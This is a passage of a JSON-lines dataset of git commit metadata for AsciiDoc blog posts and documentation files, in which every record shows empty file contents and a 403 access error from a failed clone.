2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4845bc095b0169aeab5d9f1d6d3e85ab33e50c9","subject":"The nexus.png image should not be inline - was creating a folder called \":images\"","message":"The nexus.png image should not be inline - was creating a folder called \":images\"\n\nOriginal commit: elastic\/x-pack-elasticsearch@f935e44b042bb7a924c8cafb1abf53e021f53929\n","repos":"uschindler\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,gfyoung\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/en\/security\/tribe-clients-integrations\/java.asciidoc","new_file":"docs\/en\/security\/tribe-clients-integrations\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19e8c6fa9d3f14d74b6c780b1c0cca071d4001f9","subject":"Add article: Steins;Git\u3092C86(\u30b3\u30df\u30c3\u30af\u30de\u30fc\u30b1\u30c3\u30c886)\u306b\u3066\u9812\u5e03\u3057\u307e\u3059","message":"Add article: Steins;Git\u3092C86(\u30b3\u30df\u30c3\u30af\u30de\u30fc\u30b1\u30c3\u30c886)\u306b\u3066\u9812\u5e03\u3057\u307e\u3059\n","repos":"o2project\/blog.o2p.jp,o2project\/blog.o2p.jp,o2project\/blog.o2p.jp","old_file":"source\/archives\/2014-07-22-c86-steins-git.adoc","new_file":"source\/archives\/2014-07-22-c86-steins-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/o2project\/blog.o2p.jp.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f70cfd25ef6138097219d9328105b0ce03862112","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 
2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"faef5be3f6530e65904c04cb68027ef0b402e892","subject":"Update 2016-01-28-Minimal-Centos-7-Image-with-Docker.adoc","message":"Update 2016-01-28-Minimal-Centos-7-Image-with-Docker.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-01-28-Minimal-Centos-7-Image-with-Docker.adoc","new_file":"_posts\/2016-01-28-Minimal-Centos-7-Image-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73f901870f412e6c22e253499146f117c119a170","subject":"Renamed '_posts\/2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc' to '_posts\/2016-03-23-Microservices-in-the-Chronicle-world-Part-1.adoc'","message":"Renamed '_posts\/2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc' to '_posts\/2016-03-23-Microservices-in-the-Chronicle-world-Part-1.adoc'","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-23-Microservices-in-the-Chronicle-world-Part-1.adoc","new_file":"_posts\/2016-03-23-Microservices-in-the-Chronicle-world-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7344b0071e10d80b939fca855741aed92c85edd","subject":"Some reasons","message":"Some reasons\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Local design.adoc","new_file":"Best practices\/Local design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3695a8474fc19ab08e692b5ead4c4f4f9a57cca","subject":"README.adoc addition","message":"README.adoc addition\n","repos":"vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples","old_file":"junit5-examples\/README.adoc","new_file":"junit5-examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91b8eab02700de505141053191f795afd93e1275","subject":"Clarify some configuration in documentation","message":"Clarify some configuration in documentation\n\nSome of the examples used to illustrate multi-git configuration\nare apparently confusing. 
This change adds some clarification.\n\nFixes gh-213\n","repos":"fkissel\/spring-cloud-config,rajkumargithub\/spring-cloud-config,shakuzen\/spring-cloud-config,mstine\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config,fkissel\/spring-cloud-config,mbenson\/spring-cloud-config,fangjing828\/spring-cloud-config,psbateman\/spring-cloud-config,appleman\/spring-cloud-config,royclarkson\/spring-cloud-config,royclarkson\/spring-cloud-config,shakuzen\/spring-cloud-config,mbenson\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,royclarkson\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,appleman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,psbateman\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,marbon87\/spring-cloud-config,thomasdarimont\/spring-cloud-config,thomasdarimont\/spring-cloud-config,psbateman\/spring-cloud-config,fangjing828\/spring-cloud-config,rajkumargithub\/spring-cloud-config,spring-cloud\/spring-cloud-config,mstine\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e6f204622cf046eb63b11880671be4906d45089","subject":"Minor edits to styleguide","message":"Minor edits to styleguide","repos":"Onager\/artifacts,joachimmetz\/artifacts,joachimmetz\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts,pstirparo\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"946271feb337c064a8b3f38e5aca26be3c99b81d","subject":"Update 2016-04-16-Hub-Press.adoc","message":"Update 2016-04-16-Hub-Press.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-Hub-Press.adoc","new_file":"_posts\/2016-04-16-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efd93b597dece3058e251e0615a161ed6f044967","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"015cb2156d6da0345be02cd0cbb3b61f2ba79e4c","subject":"Update 
2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5955f9b031137742727610b3cf8a7c184f16c316","subject":"Update 2015-09-10-Ruby-on-Rails-Bootstrap.adoc","message":"Update 2015-09-10-Ruby-on-Rails-Bootstrap.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-09-10-Ruby-on-Rails-Bootstrap.adoc","new_file":"_posts\/2015-09-10-Ruby-on-Rails-Bootstrap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cc6896f8975d292b5bfc7c064974ddfaa85a28b","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd4ff551faec50066d6d5eb74c21c5a7201c0765","subject":"Update 2016-04-03-Houdini-material-override.adoc","message":"Update 2016-04-03-Houdini-material-override.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-04-03-Houdini-material-override.adoc","new_file":"_posts\/2016-04-03-Houdini-material-override.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26abc90d8e324a4d0f675999ebbc08b9ca1cb670","subject":"Adding 1.3 Beta2 release announcement","message":"Adding 1.3 Beta2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-09-16-debezium-1-3-beta2-released.adoc","new_file":"blog\/2020-09-16-debezium-1-3-beta2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3d80ce5f8e8917dad1f7c260c869e472fa6fcc2c","subject":"Add a basic FAQ","message":"Add a basic 
FAQ\n","repos":"jkonecny12\/kakoune,jjthrash\/kakoune,Somasis\/kakoune,casimir\/kakoune,alexherbo2\/kakoune,danr\/kakoune,casimir\/kakoune,flavius\/kakoune,lenormf\/kakoune,lenormf\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,ekie\/kakoune,occivink\/kakoune,danr\/kakoune,Somasis\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,casimir\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,ekie\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,flavius\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,Somasis\/kakoune,danr\/kakoune,occivink\/kakoune,lenormf\/kakoune,danr\/kakoune,jjthrash\/kakoune,Somasis\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,ekie\/kakoune,mawww\/kakoune,occivink\/kakoune,ekie\/kakoune,occivink\/kakoune","old_file":"doc\/manpages\/faq.asciidoc","new_file":"doc\/manpages\/faq.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"1eafbc24381bd179133de50d4e2303750148fe1f","subject":"Move repo clone after authentication","message":"Move repo clone after authentication","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"6e9bbdc91c134be0ebe29f594f7acf500b1671c0","subject":"Update 2017-03-03-C-S-S-triangle.adoc","message":"Update 2017-03-03-C-S-S-triangle.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a462b6afc7b09ad5a5acd0beb72822ff8a700cc","subject":"y2b create post DON'T Buy This \\","message":"y2b create post DON'T Buy This \\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-14-DONT-Buy-This-.adoc","new_file":"_posts\/2017-09-14-DONT-Buy-This-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"894ef5c78be57542928e84ec45f6c516095e2486","subject":"Update 2018-07-07-cookie-custard.adoc","message":"Update 2018-07-07-cookie-custard.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-07-cookie-custard.adoc","new_file":"_posts\/2018-07-07-cookie-custard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5aec10808eb1c14086737f16888edf9201af603b","subject":"Update changelog","message":"Update changelog\n","repos":"rumpelsepp\/pynote","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"907dbe82c4cafa89624d4727564480694b9335b9","subject":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","message":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87cf1f3c1915b3b8c0619cae2f55a479c395add0","subject":"Update 2016-12-06-problem-solving-C.adoc","message":"Update 2016-12-06-problem-solving-C.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-C.adoc","new_file":"_posts\/2016-12-06-problem-solving-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1dd1eaf6377b6d5383829b3174fd0c1f123d8b8","subject":"Update 2017-11-28-Cisco-Phone-Setup.adoc","message":"Update 2017-11-28-Cisco-Phone-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-28-Cisco-Phone-Setup.adoc","new_file":"_posts\/2017-11-28-Cisco-Phone-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc7178e10c83cf675c6719f549c3b469e2927a6","subject":"Hiring blogpost","message":"Hiring blogpost\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2022-11-15-filling-the-ranks.adoc","new_file":"_posts\/2022-11-15-filling-the-ranks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77dee214588e57846a8f03169c85f1377c28de92","subject":"Update 2016-10-11-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","message":"Update 
2016-10-11-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","repos":"luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2016-10-11-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","new_file":"_posts\/2016-10-11-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2825e997aecfe6982af3a2d2f2408fc7f1f92ba5","subject":"Update graceful-shutdown.adoc (#6579)","message":"Update graceful-shutdown.adoc (#6579)\n\nTypo","repos":"tadayosi\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,adessaigne\/camel,tadayosi\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,christophd\/camel,apache\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,cunningt\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/graceful-shutdown.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/graceful-shutdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fa2d2fecce69c783c9e38813e0b6a08a062f3e5","subject":"Update 2011-09-26-1651-Changement-du-theme.adoc","message":"Update 2011-09-26-1651-Changement-du-theme.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-09-26-1651-Changement-du-theme.adoc","new_file":"_posts\/2011-09-26-1651-Changement-du-theme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16b39c2d38d8ab6ab36b0b50a187325b4bc3bafa","subject":"Update 2017-08-17-Acemice-Belki-Hadsizce-6.adoc","message":"Update 2017-08-17-Acemice-Belki-Hadsizce-6.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-08-17-Acemice-Belki-Hadsizce-6.adoc","new_file":"_posts\/2017-08-17-Acemice-Belki-Hadsizce-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b30fd3476cead7f1a12f0f49b0867bbf174774e8","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"12a7e354c6ada9e83f9e5dfe0a679168a575eb20","subject":"react section","message":"react section\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"React.adoc","new_file":"React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"7dfb0a829b2cc0bff29285309d4f63ea89702dc9","subject":"Update 2015-01-23-Preparando-um-projeto-Cordova-para-publicacao.adoc","message":"Update 2015-01-23-Preparando-um-projeto-Cordova-para-publicacao.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-01-23-Preparando-um-projeto-Cordova-para-publicacao.adoc","new_file":"_posts\/2015-01-23-Preparando-um-projeto-Cordova-para-publicacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"497e6dcb09189d423ba980dbb96f9173872ba890","subject":"API-Guide.adoc","message":"API-Guide.adoc\n","repos":"sawied\/swp,sawied\/swp,sawied\/swp","old_file":"service\/src\/main\/asciidoc\/API-Guide.adoc","new_file":"service\/src\/main\/asciidoc\/API-Guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sawied\/swp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bfebd2c846217b8a8b69020b7216df8f9df5c87","subject":"add QUICKSTART document","message":"add QUICKSTART document\n","repos":"brainpower\/checkarg,brainpower\/checkarg,brainpower\/checkarg,brainpower\/checkarg,brainpower\/checkarg","old_file":"QUICKSTART.asciidoc","new_file":"QUICKSTART.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brainpower\/checkarg.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d113710a13c0885abb3ae64ee016bb236765129","subject":"Lambdas doc","message":"Lambdas doc\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Syntax\/Lambdas.adoc","new_file":"Syntax\/Lambdas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81440c7da534e76bf9e83238ce6403afda04f579","subject":":memo: docker snippets","message":":memo: docker snippets\n","repos":"syon\/refills","old_file":"src\/refills\/docker\/nodejs-code-tips.adoc","new_file":"src\/refills\/docker\/nodejs-code-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46dbc4fe24e2ec8dfb67e1f6527857932305088c","subject":"Update 2016-11-10.adoc","message":"Update 
2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10.adoc","new_file":"_posts\/2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b056ca352d9308d04ee64223548d1eb37a9cb12","subject":"y2b create post SECRET AGENT GLOVE PHONE","message":"y2b create post SECRET AGENT GLOVE PHONE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-22-SECRET-AGENT-GLOVE-PHONE.adoc","new_file":"_posts\/2016-06-22-SECRET-AGENT-GLOVE-PHONE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48df205f051a90e10ebd7a10ac15723e937d2442","subject":"Update 2016-04-21-.adoc","message":"Update 2016-04-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-21-.adoc","new_file":"_posts\/2016-04-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f07df67dbaf72b014058497f889539f978721f3","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 